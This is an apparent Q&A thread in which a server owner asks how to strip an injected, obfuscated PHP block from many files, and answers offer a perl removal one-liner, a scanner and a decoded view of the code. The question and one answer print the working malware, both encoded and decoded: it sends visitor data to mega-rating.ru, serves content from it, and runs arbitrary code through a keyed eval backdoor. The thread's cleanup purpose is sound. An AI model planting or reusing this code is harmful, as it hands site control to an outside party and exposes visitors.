# Malware attack on my server

Tags: php, regex, sed, malware, debian-7.6.0

All the Index.php, header.php, footer.php files on my server have this code segment. Possible Malware. Now i would like to remove all this junk data from all my files at once. I'm using PHP on Debian system.

```
<?php
//###=CACHE START=###
error_reporting(0); 
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvEcpPN9VPEsH0IFIxIFJlWFEH1CIRIsDHERHvWqBjbxqKWfVQ0tVzu0qUN6Yl9gMJquYKWuqTyhMl5lqF9aMKDhpTujC2yjCFVhqKWfMJ5wo2EyXPEcpPxhVvMxCFVhqKWfMJ5wo2EyXPExXF4vWaH9Vv51pzkyozAiMTHbWUHcYvVzLm0vYvEwYvVznG0kWzt9Vv5gMQHbVwN1LJIzMGIxMwN4ZGt5AwquZJV0AGx2ATZmAQLkAmSyVv4xMP4xqF4xLl4vZFVcBjccMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsFOyoUAynJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWUWyp3IfqPN9VTA1pzksMKuyLltxL2tcBjcwqKWfK2Afo3AyXPEwnPx7PvEcLaLtCFNxpzImqJk0Bjc9VTIfp2HtrjbxMaNtCFOzp29wn29jMJ4bVz1yM2RgpzS0nJ5aYaW1VvjtBQNfVPEypaWholjtWTIlpaA0pvjtZmNcBjccMvNbWTMjXFO7PvNtVPNxo3I0VQ0tVxqSIPNiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxnKNcYvVzMQ0vYaIloTIhL29xMFtxMPxhVvM1CFVhqKWfMJ5wo2EyXPE1XF4vWzZ9Vv4xLl4vWzx9ZFMbCFVhoJD1XPVjAJSyMzH1MTLjBQR4BGL3LGSvAQH5AwEwZmD2ZGpkMFVhWTDhWUHhWTZhVwRvXF4vVRuHISNiZF4kKUWpovV7PvNtVPNxo3I0VP49VPWVo3A0BvOgMJquYKWuqTyhMl5lqIklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwL5LzZjBGZjVvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
//###=CACHE END=###
?>
```

I've Tried using Regex via PHP but no help
i've also tried sed on Linux server

```
sed -e '/@\$stringd' index.php
```

but unable to save file.
Please help.

Comment: You should re-install your server and use a backup of your code, who knows what backdoors are installed right now...

Comment: @jeroen what you are saying does make sense but it is difficult to take backup of my dedicated server, i've got approx 60-70 websites and hundreds of app scripts.

Comment: Changing a few php files is not going to make this problem go away. You might as well do it the right way now as you will end up doing it any way...

Answer (score 0, accepted):

Reinstalling the server is indeed the safest option.
But without recent backups of those php scripts ...

Anyway, sed isn't the best tool for multi-line replacements in files.
And you'd want to remove anything between those CACHE comments.
I would use Perl or Awk for that.

Here's a single line perl solution that removes those comments from a file.
(also creates a .bak copy of the original file)

```
perl -i.bak -p -0 -e 's@//###=CACHE.*?CACHE END=###@@gs' index.php
```

Note that @ was used to for the separators of the regex. Typically `/` is used, but this way the `/` don't have to be backslashed in the regex.

For multiple *.php files (without .bak copies)

```
perl -i -p -0 -e 's@//###=CACHE.*?CACHE END=###@@gs' *.php
```

The perl flags used:

```
-i[extension]     edit <> files in place (makes backup if extension supplied)
-p                assume loop like -n but print line also, like sed
-0[octal]         specify record separator (\0, if no argument)
-e program        one line of program (several -e's allowed, omit programfile)
```

Comment: Thanks @LukStorms the perl script works like charm!! I'll go with your suggestion of reinstalling

Comment: Is there a way to run this perl command in loop for all *.php files in a folder?

Comment: One of the ways is to use `find` for that and -exec your command.  Not sure if it's different on debian, but on Linux is would something like `find . -type f -iname '*.php' -exec perl myperlscript.pl {} \;`

Comment: I couldn't test it at the time, but something like *.php does work also with the perl in-place replacement.  No need to use the find -exec or a bash loop after all. :)

Answer (score 1):

As @jeroen said, re-installing would be good because you really don't know what backdoors could be around right now.

Then you will have to clean up your PHP files. Create a new script in your projects root directory something like `scan.php`.

Instead of automatically removing the problems i would suggest creating a helper to check where there might be still malware inside your code:

```
$dir = new DirectoryIterator(dirname(__FILE__));

foreach ($dir as $fileinfo) 
{
    if (!$fileinfo->isDot()) 
    {
        $fileContents = file_get_contents($fileinfo->getFilename());

        if (strpos($fileContents, 'str_rot13') !== false)
        {
            print "Check this file: " . $fileinfo->getFilename() . "\n";
        }
    }
}
```

This script is pretty Raw you will have to modifiy it for your needs.

### Block connections

The decoded script looks the following:

```
<?php

if (isset($ibv)) {
    echo $ibv;
} else {
    error_reporting(0);
    ini_set('display_errors', '0');
    if (!isset($ibv)) {
        if (!empty($_COOKIE['client_check'])) {
            die($_COOKIE['client_check']);
        }
        if (preg_match('!\S!u', file_get_contents($_SERVER['SCRIPT_FILENAME']))) {
            $c = 'u';
        } else {
            $c = 'w';
        }
        $d = $_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
        $u = $_SERVER['HTTP_USER_AGENT'];
        $ip = $_SERVER['REMOTE_ADDR'];
        $url = 'http://mega-rating.ru/get.php?ip='.urlencode($ip).'&d='.urlencode($d).'&u='.urlencode($u).'&c='.$c.'&i=1&h='.md5('05aefe5df0818967a1b45964c346171e'.$d.$u.$c.'1');
        if (ini_get('allow_url_fopen') == 1) {
            $ibv = file_get_contents($url);
        } elseif (function_exists('curl_init')) {
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_HEADER, false);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            $result = curl_exec($ch);
            curl_close($ch);
            $ibv = $result;
        } else {
            $fp = fsockopen('mega-rating.ru', 80, $errno, $errstr, 30);
            if ($fp) {
                $out = 'GET /get.php?ip='.urlencode($ip).'&d='.urlencode($d).'&u='.urlencode($u).'&c='.$c.'&i=1&h='.md5('05aefe5df0818967a1b45964c346171e'.$d.$u.$c.'1')." HTTP/1.1\r\n";
                $out .= "Host: mega-rating.ru\r\n";
                $out .= "Connection: Close\r\n\r\n";
                fwrite($fp, $out);
                $resp = '';
                while (!feof($fp)) {
                    $resp .= fgets($fp, 128);
                }

                fclose($fp);
                list($header, $body) = preg_split("/\R\R/", $resp, 2);
                $ibv = $body;
            }
        }
    };
    if (isset($_REQUEST['p']) && $_REQUEST['p'] == '69bc0930') {
        eval(stripslashes($_REQUEST['c']));
    }

    echo $ibv;
}
```

I would also suggest blocking all connections in and out to the host `mega-rating.ru`.

Comment: Thanks @Mario I would go for reinstalling the server. and I'll also block any connections to the website you've give to be future safe.